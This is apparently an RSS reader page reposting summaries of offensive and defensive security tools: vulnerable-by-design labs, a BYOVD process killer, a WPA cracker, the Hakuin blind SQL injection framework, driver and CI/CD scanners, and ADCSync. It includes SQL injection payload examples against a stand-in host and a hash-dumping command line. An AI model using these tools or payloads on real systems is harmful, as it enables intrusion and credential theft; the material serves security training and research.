FreshRSS

๐Ÿ”’
โŒ Secure Planet Training Courses Updated For 2019 - Click Here
There are new available articles, click to refresh the page.
Before yesterdayYour RSS feeds

Damn-Vulnerable-Drone - An Intentionally Vulnerable Drone Hacking Simulator Based On The Popular ArduPilot/MAVLink Architecture, Providing A Realistic Environment For Hands-On Drone Hacking

By: Zion3R


The Damn Vulnerable Drone is an intentionally vulnerable drone hacking simulator based on the popular ArduPilot/MAVLink architecture, providing a realistic environment for hands-on drone hacking.


    About the Damn Vulnerable Drone


    What is the Damn Vulnerable Drone?

    The Damn Vulnerable Drone is a virtually simulated environment designed for offensive security professionals to safely learn and practice drone hacking techniques. It simulates real-world ArduPilot & MAVLink drone architectures and vulnerabilities, offering a hands-on experience in exploiting drone systems.

    Why was it built?

    The Damn Vulnerable Drone aims to enhance offensive security skills within a controlled environment, making it an invaluable tool for intermediate-level security professionals, pentesters, and hacking enthusiasts.

    Similar to how pilots utilize flight simulators for training, we can use the Damn Vulnerable Drone simulator to gain in-depth knowledge of real-world drone systems, understand their vulnerabilities, and learn effective methods to exploit them.

    The Damn Vulnerable Drone platform is open-source and available at no cost and was specifically designed to address the substantial expenses often linked with drone hardware, hacking tools, and maintenance. Its cost-free nature allows users to immerse themselves in drone hacking without financial concerns. This accessibility makes the Damn Vulnerable Drone a crucial resource for those in the fields of information security and penetration testing, promoting the development of offensive cybersecurity skills in a safe environment.

    How does it work?

    The Damn Vulnerable Drone platform operates on the principle of Software-in-the-Loop (SITL), a simulation technique that allows users to run drone software as if it were executing on an actual drone, thereby replicating authentic drone behaviors and responses.

    ArduPilot's SITL allows for the execution of the drone's firmware within a virtual environment, mimicking the behavior of a real drone without the need for physical hardware. This simulation is further enhanced with Gazebo, a dynamic 3D robotics simulator, which provides a realistic environment and physics engine for the drone to interact with. Together, ArduPilot's SITL and Gazebo lay the foundation for a sophisticated and authentic drone simulation experience.

    While the current Damn Vulnerable Drone setup doesn't mirror every drone architecture or configuration, the integrated tactics, techniques and scenarios are broadly applicable across various drone systems, models and communication protocols.

    Features

    • Docker-based Environment: Runs in a completely virtualized docker-based setup, making it accessible and safe for drone hacking experimentation.
    • Simulated Wireless Networking: Simulated Wifi (802.11) interfaces to practice wireless drone attacks.
    • Onboard Camera Streaming & Gimbal: Simulated RTSP drone onboard camera stream with gimbal and companion computer integration.
    • Companion Computer Web Interface: Companion Computer configuration management via web interface and simulated serial connection to Flight Controller.
    • QGroundControl/MAVProxy Integration: One-click QGroundControl UI launching (only supported on x86 architecture) with MAVProxy GCS integration.
    • MAVLink Router Integration: Telemetry forwarding via MAVLink Router on the Companion Computer Web Interface.
    • Dynamic Flight Logging: Fully dynamic Ardupilot flight bin logs stored on a simulated SD Card.
    • Management Web Console: Simple to use simulator management web console used to trigger scenarios and drone flight states.
    • Comprehensive Hacking Scenarios: Ideal for practicing a wide range of drone hacking techniques, from basic reconnaissance to advanced exploitation.
    • Detailed Walkthroughs: If you need help hacking against a particular scenario you can leverage the detailed walkthrough documentation as a spoiler.


    VulnNodeApp - A Vulnerable Node.Js Application

    By: Zion3R


    A vulnerable application made using node.js, express server and ejs template engine. This application is meant for educational purposes only.


    Setup

    Clone this repository

    git clone https://github.com/4auvar/VulnNodeApp.git

    Application setup:

    • Install the latest node.js version with npm.
    • Open terminal/command prompt and navigate to the location of downloaded/cloned repository.
    • Run command: npm install

    DB setup

    • Install and configure latest mysql version and start the mysql service/deamon
    • Login with root user in mysql and run below sql script:
    CREATE USER 'vulnnodeapp'@'localhost' IDENTIFIED BY 'password';
    create database vuln_node_app_db;
    GRANT ALL PRIVILEGES ON vuln_node_app_db.* TO 'vulnnodeapp'@'localhost';
    USE vuln_node_app_db;
    create table users (id int AUTO_INCREMENT PRIMARY KEY, fullname varchar(255), username varchar(255),password varchar(255), email varchar(255), phone varchar(255), profilepic varchar(255));
    insert into users(fullname,username,password,email,phone) values("test1","test1","test1","test1@test.com","976543210");
    insert into users(fullname,username,password,email,phone) values("test2","test2","test2","test2@test.com","9887987541");
    insert into users(fullname,username,password,email,phone) values("test3","test3","test3","test3@test.com","9876987611");
    insert into users(fullname,username,password,email,phone) values("test4","test4","test4","test4@test.com","9123459876");
    insert into users(fullname,username,password,email,phone) values("test5","test5","test 5","test5@test.com","7893451230");

    Set basic environment variable

    • User needs to set the below environment variable.
      • DATABASE_HOST (E.g: localhost, 127.0.0.1, etc...)
      • DATABASE_NAME (E.g: vuln_node_app_db or DB name you change in above DB script)
      • DATABASE_USER (E.g: vulnnodeapp or user name you change in above DB script)
      • DATABASE_PASS (E.g: password or password you change in above DB script)

    Start the server

    • Open the command prompt/terminal and navigate to the location of your repository
    • Run command: npm start
    • Access the application at http://localhost:3000

    Vulnerability covered

    • SQL Injection
    • Cross Site Scripting (XSS)
    • Insecure Direct Object Reference (IDOR)
    • Command Injection
    • Arbitrary File Retrieval
    • Regular Expression Injection
    • External XML Entity Injection (XXE)
    • Node js Deserialization
    • Security Misconfiguration
    • Insecure Session Management

    TODO

    • Will add new vulnerabilities such as CORS, Template Injection, etc...
    • Improve application documentation

    Issues

    • In case of bugs in the application, feel free to create an issues on github.

    Contribution

    • Feel free to create a pull request for any contribution.

    You can reach me out at @4auvar



    XMGoat - Composed of XM Cyber terraform templates that help you learn about common Azure security issues

    By: Zion3R


    XM Goat is composed of XM Cyber terraform templates that help you learn about common Azure security issues. Each template is a vulnerable environment, with some significant misconfigurations. Your job is to attack and compromise the environments.

    Here's what to do for each environment:

    1. Run installation and then get started.

    2. With the initial user and service principal credentials, attack the environment based on the scenario flow (for example, XMGoat/scenarios/scenario_1/scenario1_flow.png).

    3. If you need help with your attack, refer to the solution (for example, XMGoat/scenarios/scenario_1/solution.md).

    4. When you're done learning the attack, clean up.


    Requirements

    • Azure tenant
    • Terafform version 1.0.9 or above
    • Azure CLI
    • Azure User with Owner permissions on Subscription and Global Admin privileges in AAD

    Installation

    Run these commands:

    $ az login
    $ git clone https://github.com/XMCyber/XMGoat.git
    $ cd XMGoat
    $ cd scenarios
    $ cd scenario_<\SCENARIO>

    Where <\SCENARIO> is the scenario number you want to complete

    $ terraform init
    $ terraform plan -out <\FILENAME>
    $ terraform apply <\FILENAME>

    Where <\FILENAME> is the name of the output file

    Get started

    To get the initial user and service principal credentials, run the following query:

    $ terraform output --json

    For Service Principals, use application_id.value and application_secret.value.

    For Users, use username.value and password.value.

    Cleaning up

    After completing the scenario, run the following command in order to clean all the resources created in your tenant

    $ az login
    $ cd XMGoat
    $ cd scenarios
    $ cd scenario_<\SCENARIO>

    Where <\SCENARIO> is the scenario number you want to complete

    $ terraform destroy


    ROPDump - A Command-Line Tool Designed To Analyze Binary Executables For Potential Return-Oriented Programming (ROP) Gadgets, Buffer Overflow Vulnerabilities, And Memory Leaks

    By: Zion3R


    ROPDump is a tool for analyzing binary executables to identify potential Return-Oriented Programming (ROP) gadgets, as well as detecting potential buffer overflow and memory leak vulnerabilities.


    Features

    • Identifies potential ROP gadgets in binary executables.
    • Detects potential buffer overflow vulnerabilities by analyzing vulnerable functions.
    • Generates exploit templates to make the exploit process faster
    • Identifies potential memory leak vulnerabilities by analyzing memory allocation functions.
    • Can print function names and addresses for further analysis.
    • Supports searching for specific instruction patterns.

    Usage

    • <binary>: Path to the binary file for analysis.
    • -s, --search SEARCH: Optional. Search for specific instruction patterns.
    • -f, --functions: Optional. Print function names and addresses.

    Examples

    • Analyze a binary without searching for specific instructions:

    python3 ropdump.py /path/to/binary

    • Analyze a binary and search for specific instructions:

    python3 ropdump.py /path/to/binary -s "pop eax"

    • Analyze a binary and print function names and addresses:

    python3 ropdump.py /path/to/binary -f



    Reaper - Proof Of Concept On BYOVD Attack

    By: Zion3R


    Reaper is a proof-of-concept designed to exploit BYOVD (Bring Your Own Vulnerable Driver) driver vulnerability. This malicious technique involves inserting a legitimate, vulnerable driver into a target system, which allows attackers to exploit the driver to perform malicious actions.

    Reaper was specifically designed to exploit the vulnerability present in the kprocesshacker.sys driver in version 2.8.0.0, taking advantage of its weaknesses to gain privileged access and control over the target system.

    Note: Reaper does not kill the Windows Defender process, as it has a protection, Reaper is a simple proof of concept.


    Features

    • Kill process
    • Suspend process

    Help

          ____
    / __ \___ ____ _____ ___ _____
    / /_/ / _ \/ __ `/ __ \/ _ \/ ___/
    / _, _/ __/ /_/ / /_/ / __/ /
    /_/ |_|\___/\__,_/ .___/\___/_/
    /_/

    [Coded by MrEmpy]
    [v1.0]

    Usage: C:\Windows\Temp\Reaper.exe [OPTIONS] [VALUES]
    Options:
    sp, suspend process
    kp, kill process

    Values:
    PROCESSID process id to suspend/kill

    Examples:
    Reaper.exe sp 1337
    Reaper.exe kp 1337

    Demonstration

    Install

    You can compile it directly from the source code or download it already compiled. You will need Visual Studio 2022 to compile.

    Note: The executable and driver must be in the same directory.



    Pyrit - The Famous WPA Precomputed Cracker

    By: Zion3R


    Pyrit allows you to create massive databases of pre-computed WPA/WPA2-PSK authentication phase in a space-time-tradeoff. By using the computational power of Multi-Core CPUs and other platforms through ATI-Stream,Nvidia CUDA and OpenCL, it is currently by far the most powerful attack against one of the world's most used security-protocols.

    WPA/WPA2-PSK is a subset of IEEE 802.11 WPA/WPA2 that skips the complex task of key distribution and client authentication by assigning every participating party the same pre shared key. This master key is derived from a password which the administrating user has to pre-configure e.g. on his laptop and the Access Point. When the laptop creates a connection to the Access Point, a new session key is derived from the master key to encrypt and authenticate following traffic. The "shortcut" of using a single master key instead of per-user keys eases deployment of WPA/WPA2-protected networks for home- and small-office-use at the cost of making the protocol vulnerable to brute-force-attacks against it's key negotiation phase; it allows to ultimately reveal the password that protects the network. This vulnerability has to be considered exceptionally disastrous as the protocol allows much of the key derivation to be pre-computed, making simple brute-force-attacks even more alluring to the attacker. For more background see this article on the project's blog (Outdated).


    The author does not encourage or support using Pyrit for the infringement of peoples' communication-privacy. The exploration and realization of the technology discussed here motivate as a purpose of their own; this is documented by the open development, strictly sourcecode-based distribution and 'copyleft'-licensing.

    Pyrit is free software - free as in freedom. Everyone can inspect, copy or modify it and share derived work under the GNU General Public License v3+. It compiles and executes on a wide variety of platforms including FreeBSD, MacOS X and Linux as operation-system and x86-, alpha-, arm-, hppa-, mips-, powerpc-, s390 and sparc-processors.

    Attacking WPA/WPA2 by brute-force boils down to to computing Pairwise Master Keys as fast as possible. Every Pairwise Master Key is 'worth' exactly one megabyte of data getting pushed through PBKDF2-HMAC-SHA1. In turn, computing 10.000 PMKs per second is equivalent to hashing 9,8 gigabyte of data with SHA1 in one second.

    These are examples of how multiple computational nodes can access a single storage server over various ways provided by Pyrit:

    • A single storage (e.g. a MySQL-server)
    • A local network that can access the storage-server directly and provide four computational nodes on various levels with only one node actually accessing the storage server itself.
    • Another, untrusted network can access the storage through Pyrit's RPC-interface and provides three computional nodes, two of which actually access the RPC-interface.

    What's new

    • Fixed #479 and #481
    • Pyrit CUDA now compiles in OSX with Toolkit 7.5
    • Added use_CUDA and use_OpenCL in config file
    • Improved cores listing and managing
    • limit_ncpus now disables all CPUs when set to value <= 0
    • Improve CCMP packet identification, thanks to yannayl

    See CHANGELOG file for a better description.

    How to use

    Pyrit compiles and runs fine on Linux, MacOS X and BSD. I don't care about Windows; drop me a line (read: patch) if you make Pyrit work without copying half of GNU ... A guide for installing Pyrit on your system can be found in the wiki. There is also a Tutorial and a reference manual for the commandline-client.

    How to participate

    You may want to read this wiki-entry if interested in porting Pyrit to new hardware-platform. Contributions or bug reports you should [submit an Issue] (https://github.com/JPaulMora/Pyrit/issues).



    Hakuin - A Blazing Fast Blind SQL Injection Optimization And Automation Framework

    By: Zion3R


    Hakuin is a Blind SQL Injection (BSQLI) optimization and automation framework written in Python 3. It abstracts away the inference logic and allows users to easily and efficiently extract databases (DB) from vulnerable web applications. To speed up the process, Hakuin utilizes a variety of optimization methods, including pre-trained and adaptive language models, opportunistic guessing, parallelism and more.

    Hakuin has been presented at esteemed academic and industrial conferences: - BlackHat MEA, Riyadh, 2023 - Hack in the Box, Phuket, 2023 - IEEE S&P Workshop on Offsensive Technology (WOOT), 2023

    More information can be found in our paper and slides.


    Installation

    To install Hakuin, simply run:

    pip3 install hakuin

    Developers should install the package locally and set the -e flag for editable mode:

    git clone git@github.com:pruzko/hakuin.git
    cd hakuin
    pip3 install -e .

    Examples

    Once you identify a BSQLI vulnerability, you need to tell Hakuin how to inject its queries. To do this, derive a class from the Requester and override the request method. Also, the method must determine whether the query resolved to True or False.

    Example 1 - Query Parameter Injection with Status-based Inference
    import aiohttp
    from hakuin import Requester

    class StatusRequester(Requester):
    async def request(self, ctx, query):
    r = await aiohttp.get(f'http://vuln.com/?n=XXX" OR ({query}) --')
    return r.status == 200
    Example 2 - Header Injection with Content-based Inference
    class ContentRequester(Requester):
    async def request(self, ctx, query):
    headers = {'vulnerable-header': f'xxx" OR ({query}) --'}
    r = await aiohttp.get(f'http://vuln.com/', headers=headers)
    return 'found' in await r.text()

    To start extracting data, use the Extractor class. It requires a DBMS object to contruct queries and a Requester object to inject them. Hakuin currently supports SQLite, MySQL, PSQL (PostgreSQL), and MSSQL (SQL Server) DBMSs, but will soon include more options. If you wish to support another DBMS, implement the DBMS interface defined in hakuin/dbms/DBMS.py.

    Example 1 - Extracting SQLite/MySQL/PSQL/MSSQL
    import asyncio
    from hakuin import Extractor, Requester
    from hakuin.dbms import SQLite, MySQL, PSQL, MSSQL

    class StatusRequester(Requester):
    ...

    async def main():
    # requester: Use this Requester
    # dbms: Use this DBMS
    # n_tasks: Spawns N tasks that extract column rows in parallel
    ext = Extractor(requester=StatusRequester(), dbms=SQLite(), n_tasks=1)
    ...

    if __name__ == '__main__':
    asyncio.get_event_loop().run_until_complete(main())

    Now that eveything is set, you can start extracting DB metadata.

    Example 1 - Extracting DB Schemas
    # strategy:
    # 'binary': Use binary search
    # 'model': Use pre-trained model
    schema_names = await ext.extract_schema_names(strategy='model')
    Example 2 - Extracting Tables
    tables = await ext.extract_table_names(strategy='model')
    Example 3 - Extracting Columns
    columns = await ext.extract_column_names(table='users', strategy='model')
    Example 4 - Extracting Tables and Columns Together
    metadata = await ext.extract_meta(strategy='model')

    Once you know the structure, you can extract the actual content.

    Example 1 - Extracting Generic Columns
    # text_strategy:    Use this strategy if the column is text
    res = await ext.extract_column(table='users', column='address', text_strategy='dynamic')
    Example 2 - Extracting Textual Columns
    # strategy:
    # 'binary': Use binary search
    # 'fivegram': Use five-gram model
    # 'unigram': Use unigram model
    # 'dynamic': Dynamically identify the best strategy. This setting
    # also enables opportunistic guessing.
    res = await ext.extract_column_text(table='users', column='address', strategy='dynamic')
    Example 3 - Extracting Integer Columns
    res = await ext.extract_column_int(table='users', column='id')
    Example 4 - Extracting Float Columns
    res = await ext.extract_column_float(table='products', column='price')
    Example 5 - Extracting Blob (Binary Data) Columns
    res = await ext.extract_column_blob(table='users', column='id')

    More examples can be found in the tests directory.

    Using Hakuin from the Command Line

    Hakuin comes with a simple wrapper tool, hk.py, that allows you to use Hakuin's basic functionality directly from the command line. To find out more, run:

    python3 hk.py -h

    For Researchers

    This repository is actively developed to fit the needs of security practitioners. Researchers looking to reproduce the experiments described in our paper should install the frozen version as it contains the original code, experiment scripts, and an instruction manual for reproducing the results.

    Cite Hakuin

    @inproceedings{hakuin_bsqli,
    title={Hakuin: Optimizing Blind SQL Injection with Probabilistic Language Models},
    author={Pru{\v{z}}inec, Jakub and Nguyen, Quynh Anh},
    booktitle={2023 IEEE Security and Privacy Workshops (SPW)},
    pages={384--393},
    year={2023},
    organization={IEEE}
    }


    Ioctlance - A Tool That Is Used To Hunt Vulnerabilities In X64 WDM Drivers

    By: Zion3R

    Description

    Presented at CODE BLUE 2023, this project titled Enhanced Vulnerability Hunting in WDM Drivers with Symbolic Execution and Taint Analysis introduces IOCTLance, a tool that enhances its capacity to detect various vulnerability types in Windows Driver Model (WDM) drivers. In a comprehensive evaluation involving 104 known vulnerable WDM drivers and 328 unknow n ones, IOCTLance successfully unveiled 117 previously unidentified vulnerabilities within 26 distinct drivers. As a result, 41 CVEs were reported, encompassing 25 cases of denial of service, 5 instances of insufficient access control, and 11 examples of elevation of privilege.


    Features

    Target Vulnerability Types

    • map physical memory
    • controllable process handle
    • buffer overflow
    • null pointer dereference
    • read/write controllable address
    • arbitrary shellcode execution
    • arbitrary wrmsr
    • arbitrary out
    • dangerous file operation

    Optional Customizations

    • length limit
    • loop bound
    • total timeout
    • IoControlCode timeout
    • recursion
    • symbolize data section

    Build

    Docker (Recommand)

    docker build .

    Local

    dpkg --add-architecture i386
    apt-get update
    apt-get install git build-essential python3 python3-pip python3-dev htop vim sudo \
    openjdk-8-jdk zlib1g:i386 libtinfo5:i386 libstdc++6:i386 libgcc1:i386 \
    libc6:i386 libssl-dev nasm binutils-multiarch qtdeclarative5-dev libpixman-1-dev \
    libglib2.0-dev debian-archive-keyring debootstrap libtool libreadline-dev cmake \
    libffi-dev libxslt1-dev libxml2-dev

    pip install angr==9.2.18 ipython==8.5.0 ipdb==0.13.9

    Analysis

    # python3 analysis/ioctlance.py -h
    usage: ioctlance.py [-h] [-i IOCTLCODE] [-T TOTAL_TIMEOUT] [-t TIMEOUT] [-l LENGTH] [-b BOUND]
    [-g GLOBAL_VAR] [-a ADDRESS] [-e EXCLUDE] [-o] [-r] [-c] [-d]
    path

    positional arguments:
    path dir (including subdirectory) or file path to the driver(s) to analyze

    optional arguments:
    -h, --help show this help message and exit
    -i IOCTLCODE, --ioctlcode IOCTLCODE
    analyze specified IoControlCode (e.g. 22201c)
    -T TOTAL_TIMEOUT, --total_timeout TOTAL_TIMEOUT
    total timeout for the whole symbolic execution (default 1200, 0 to unlimited)
    -t TIMEOUT, --timeout TIMEOUT
    timeout for analyze each IoControlCode (default 40, 0 to unlimited)
    -l LENGTH, --length LENGTH
    the limit of number of instructions for technique L engthLimiter (default 0, 0
    to unlimited)
    -b BOUND, --bound BOUND
    the bound for technique LoopSeer (default 0, 0 to unlimited)
    -g GLOBAL_VAR, --global_var GLOBAL_VAR
    symbolize how many bytes in .data section (default 0 hex)
    -a ADDRESS, --address ADDRESS
    address of ioctl handler to directly start hunting with blank state (e.g.
    140005c20)
    -e EXCLUDE, --exclude EXCLUDE
    exclude function address split with , (e.g. 140005c20,140006c20)
    -o, --overwrite overwrite x.sys.json if x.sys has been analyzed (default False)
    -r, --recursion do not kill state if detecting recursion (default False)
    -c, --complete get complete base state (default False)
    -d, --debug print debug info while analyzing (default False)

    Evaluation

    # python3 evaluation/statistics.py -h
    usage: statistics.py [-h] [-w] path

    positional arguments:
    path target dir or file path

    optional arguments:
    -h, --help show this help message and exit
    -w, --wdm copy the wdm drivers into <path>/wdm

    Test

    1. Compile the testing examples in test to generate testing driver files.
    2. Run IOCTLance against the drvier files.

    Reference



    Navgix - A Multi-Threaded Golang Tool That Will Check For Nginx Alias Traversal Vulnerabilities

    By: Zion3R


    navgix is a multi-threaded golang tool that will check for nginx alias traversal vulnerabilities


    Techniques

    Currently, navgix supports 2 techniques for finding vulnerable directories (or location aliases). Those being the following:

    Heuristics

    navgix will make an initial GET request to the page, and if there are any directories specified on the page HTML (specified in src attributes on html components), it will test each folder in the path for the vulnerability, therefore if it finds a link to /static/img/photos/avatar.png, it will test /static/, /static/img/ and /static/img/photos/.

    Brute-force

    navgix will also test for a short list of common directories that are common to have this vulnerability and if any of these directories exist, it will also attempt to confirm if a vulnerability is present.

    Installation

    git clone https://github.com/Hakai-Offsec/navgix; cd navgix;
    go build

    Acknowledgements



    Raven - CI/CD Security Analyzer

    By: Zion3R


    RAVEN (Risk Analysis and Vulnerability Enumeration for CI/CD) is a powerful security tool designed to perform massive scans for GitHub Actions CI workflows and digest the discovered data into a Neo4j database. Developed and maintained by the Cycode research team.

    With Raven, we were able to identify and report security vulnerabilities in some of the most popular repositories hosted on GitHub, including:

    We listed all vulnerabilities discovered using Raven in the tool Hall of Fame.


    What is Raven

    The tool provides the following capabilities to scan and analyze potential CI/CD vulnerabilities:

    • Downloader: You can download workflows and actions necessary for analysis. Workflows can be downloaded for a specified organization or for all repositories, sorted by star count. Performing this step is a prerequisite for analyzing the workflows.
    • Indexer: Digesting the downloaded data into a graph-based Neo4j database. This process involves establishing relationships between workflows, actions, jobs, steps, etc.
    • Query Library: We created a library of pre-defined queries based on research conducted by the community.
    • Reporter: Raven has a simple way of reporting suspicious findings. As an example, it can be incorporated into the CI process for pull requests and run there.

    Possible usages for Raven:

    • Scanner for your own organization's security
    • Scanning specified organizations for bug bounty purposes
    • Scan everything and report issues found to save the internet
    • Research and learning purposes

    This tool provides a reliable and scalable solution for CI/CD security analysis, enabling users to query bad configurations and gain valuable insights into their codebase's security posture.

    Why Raven

    In the past year, Cycode Labs conducted extensive research on fundamental security issues of CI/CD systems. We examined the depths of many systems, thousands of projects, and several configurations. The conclusion is clear โ€“ the model in which security is delegated to developers has failed. This has been proven several times in our previous content:

    • A simple injection scenario exposed dozens of public repositories, including popular open-source projects.
    • We found that one of the most popular frontend frameworks was vulnerable to the innovative method of branch injection attack.
    • We detailed a completely different attack vector, 3rd party integration risks, the most popular project on GitHub, and thousands more.
    • Finally, the Microsoft 365 UI framework, with more than 300 million users, is vulnerable to an additional new threat โ€“ an artifact poisoning attack.
    • Additionally, we found, reported, and disclosed hundreds of other vulnerabilities privately.

    Each of the vulnerabilities above has unique characteristics, making it nearly impossible for developers to stay up to date with the latest security trends. Unfortunately, each vulnerability shares a commonality โ€“ each exploitation can impact millions of victims.

    It was for these reasons that Raven was created, a framework for CI/CD security analysis workflows (and GitHub Actions as the first use case). In our focus, we examined complex scenarios where each issue isn't a threat on its own, but when combined, they pose a severe threat.

    Setup && Run

    To get started with Raven, follow these installation instructions:

    Step 1: Install the Raven package

    pip3 install raven-cycode

    Step 2: Setup a local Redis server and Neo4j database

    docker run -d --name raven-neo4j -p7474:7474 -p7687:7687 --env NEO4J_AUTH=neo4j/123456789 --volume raven-neo4j:/data neo4j:5.12
    docker run -d --name raven-redis -p6379:6379 --volume raven-redis:/data redis:7.2.1

    Another way to setup the environment is by running our provided docker compose file:

    git clone https://github.com/CycodeLabs/raven.git
    cd raven
    make setup

    Step 3: Run Raven Downloader

    Org mode:

    raven download org --token $GITHUB_TOKEN --org-name RavenDemo

    Crawl mode:

    raven download crawl --token $GITHUB_TOKEN --min-stars 1000

    Step 4: Run Raven Indexer

    raven index

    Step 5: Inspect the results through the reporter

    raven report --format raw

    At this point, it is possible to inspect the data in the Neo4j database, by connecting http://localhost:7474/browser/.

    Prerequisites

    • Python 3.9+
    • Docker Compose v2.1.0+
    • Docker Engine v1.13.0+

    Infrastructure

    Raven is using two primary docker containers: Redis and Neo4j. make setup will run a docker compose command to prepare that environment.

    Usage

    The tool contains three main functionalities, download and index and report.

    Download

    Download Organization Repositories

    usage: raven download org [-h] --token TOKEN [--debug] [--redis-host REDIS_HOST] [--redis-port REDIS_PORT] [--clean-redis] --org-name ORG_NAME

    options:
    -h, --help show this help message and exit
    --token TOKEN GITHUB_TOKEN to download data from Github API (Needed for effective rate-limiting)
    --debug Whether to print debug statements, default: False
    --redis-host REDIS_HOST
    Redis host, default: localhost
    --redis-port REDIS_PORT
    Redis port, default: 6379
    --clean-redis, -cr Whether to clean cache in the redis, default: False
    --org-name ORG_NAME Organization name to download the workflows

    Download Public Repositories

    usage: raven download crawl [-h] --token TOKEN [--debug] [--redis-host REDIS_HOST] [--redis-port REDIS_PORT] [--clean-redis] [--max-stars MAX_STARS] [--min-stars MIN_STARS]

    options:
    -h, --help show this help message and exit
    --token TOKEN GITHUB_TOKEN to download data from Github API (Needed for effective rate-limiting)
    --debug Whether to print debug statements, default: False
    --redis-host REDIS_HOST
    Redis host, default: localhost
    --redis-port REDIS_PORT
    Redis port, default: 6379
    --clean-redis, -cr Whether to clean cache in the redis, default: False
    --max-stars MAX_STARS
    Maximum number of stars for a repository
    --min-stars MIN_STARS
    Minimum number of stars for a repository, default : 1000

    Index

    usage: raven index [-h] [--redis-host REDIS_HOST] [--redis-port REDIS_PORT] [--clean-redis] [--neo4j-uri NEO4J_URI] [--neo4j-user NEO4J_USER] [--neo4j-pass NEO4J_PASS]
    [--clean-neo4j] [--debug]

    options:
    -h, --help show this help message and exit
    --redis-host REDIS_HOST
    Redis host, default: localhost
    --redis-port REDIS_PORT
    Redis port, default: 6379
    --clean-redis, -cr Whether to clean cache in the redis, default: False
    --neo4j-uri NEO4J_URI
    Neo4j URI endpoint, default: neo4j://localhost:7687
    --neo4j-user NEO4J_USER
    Neo4j username, default: neo4j
    --neo4j-pass NEO4J_PASS
    Neo4j password, default: 123456789
    --clean-neo4j, -cn Whether to clean cache, and index f rom scratch, default: False
    --debug Whether to print debug statements, default: False

    Report

    usage: raven report [-h] [--redis-host REDIS_HOST] [--redis-port REDIS_PORT] [--clean-redis] [--neo4j-uri NEO4J_URI]
    [--neo4j-user NEO4J_USER] [--neo4j-pass NEO4J_PASS] [--clean-neo4j]
    [--tag {injection,unauthenticated,fixed,priv-esc,supply-chain}]
    [--severity {info,low,medium,high,critical}] [--queries-path QUERIES_PATH] [--format {raw,json}]
    {slack} ...

    positional arguments:
    {slack}
    slack Send report to slack channel

    options:
    -h, --help show this help message and exit
    --redis-host REDIS_HOST
    Redis host, default: localhost
    --redis-port REDIS_PORT
    Redis port, default: 6379
    --clean-redis, -cr Whether to clean cache in the redis, default: False
    --neo4j-uri NEO4J_URI
    Neo4j URI endpoint, default: neo4j://localhost:7687
    --neo4j-user NEO4J_USER
    Neo4j username, default: neo4j
    --neo4j-pass NEO4J_PASS
    Neo4j password, default: 123456789
    --clean-neo4j, -cn Whether to clean cache, and index from scratch, default: False
    --tag {injection,unauthenticated,fixed,priv-esc,supply-chain}, -t {injection,unauthenticated,fixed,priv-esc,supply-chain}
    Filter queries with specific tag
    --severity {info,low,medium,high,critical}, -s {info,low,medium,high,critical}
    Filter queries by severity level (default: info)
    --queries-path QUERIES_PATH, -dp QUERIES_PATH
    Queries folder (default: library)
    --format {raw,json}, -f {raw,json}
    Report format (default: raw)

    Examples

    Retrieve all workflows and actions associated with the organization.

    raven download org --token $GITHUB_TOKEN --org-name microsoft --org-name google --debug

    Scrape all publicly accessible GitHub repositories.

    raven download crawl --token $GITHUB_TOKEN --min-stars 100 --max-stars 1000 --debug

    After finishing the download process or if interrupted using Ctrl+C, proceed to index all workflows and actions into the Neo4j database.

    raven index --debug

    Now, we can generate a report using our query library.

    raven report --severity high --tag injection --tag unauthenticated

    Rate Limiting

    For effective rate limiting, you should supply a Github token. For authenticated users, the next rate limiting applies:

    • Code search - 30 queries per minute
    • Any other API - 5000 per hour

    Research Knowledge Base

    Current Limitations

    • It is possible to run external action by referencing a folder with a Dockerfile (without action.yml). Currently, this behavior isn't supported.
    • It is possible to run external action by referencing a docker container through the docker://... URL. Currently, this behavior isn't supported.
    • It is possible to run an action by referencing it locally. This creates complex behavior, as it may come from a different repository that was checked out previously. The current behavior is trying to find it in the existing repository.
    • We aren't modeling the entire workflow structure. If additional fields are needed, please submit a pull request according to the contribution guidelines.

    Future Research Work

    • Implementation of taint analysis. Example use case - a user can pass a pull request title (which is controllable parameter) to an action parameter that is named data. That action parameter may be used in a run command: - run: echo ${{ inputs.data }}, which creates a path for a code execution.
    • Expand the research for findings of harmful misuse of GITHUB_ENV. This may utilize the previous taint analysis as well.
    • Research whether actions/github-script has an interesting threat landscape. If it is, it can be modeled in the graph.

    Want more of CI/CD Security, AppSec, and ASPM? Check out Cycode

    If you liked Raven, you would probably love our Cycode platform that offers even more enhanced capabilities for visibility, prioritization, and remediation of vulnerabilities across the software delivery.

    If you are interested in a robust, research-driven Pipeline Security, Application Security, or ASPM solution, don't hesitate to get in touch with us or request a demo using the form https://cycode.com/book-a-demo/.



    ADCSync - Use ESC1 To Perform A Makeshift DCSync And Dump Hashes

    By: Zion3R


    This is a tool I whipped up together quickly to DCSync utilizing ESC1. It is quite slow but otherwise an effective means of performing a makeshift DCSync attack without utilizing DRSUAPI or Volume Shadow Copy.


    This is the first version of the tool and essentially just automates the process of running Certipy against every user in a domain. It still needs a lot of work and I plan on adding more features in the future for authentication methods and automating the process of finding a vulnerable template.

    python3 adcsync.py -u clu -p theperfectsystem -ca THEGRID-KFLYNN-DC-CA -template SmartCard -target-ip 192.168.0.98 -dc-ip 192.168.0.98 -f users.json -o ntlm_dump.txt

    ___ ____ ___________
    / | / __ \/ ____/ ___/__ ______ _____
    / /| | / / / / / \__ \/ / / / __ \/ ___/
    / ___ |/ /_/ / /___ ___/ / /_/ / / / / /__
    /_/ |_/_____/\____//____/\__, /_/ /_/\___/
    /____/

    Grabbing user certs:
